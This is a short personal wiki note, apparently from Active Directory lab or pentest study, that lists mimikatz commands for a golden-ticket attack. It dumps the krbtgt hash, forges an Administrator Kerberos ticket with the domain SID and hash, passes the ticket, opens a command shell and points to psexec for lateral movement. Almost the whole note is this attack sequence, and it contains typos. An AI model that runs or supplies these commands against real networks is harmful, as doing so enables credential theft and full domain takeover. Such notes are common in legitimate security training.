Content-Type: text/x-zim-wiki
Wiki-Format: zim 0.4
Creation-Date: 2020-06-11T06:17:26-04:00

====== golden tickets ======
Created Thursday 11 June 2020

mimikatz.exe


**lsadump::lsa /inject /name:krbtgt**

note some values

Doamin:::::: MARVEL /  {this}
NTML::::::


====== now ======

**kerberos::golden /User:Administrato /domain:{marvel.domain} / sid {doamin_coped_above} /krbtgt:{ntlm_hash_coped_above} /id:500 /ptt**

ptt-----pass the ticket


====== usage ======
**misc::cmd  {pens a cmd}**

====== take further ======
**psexec.exe**


 
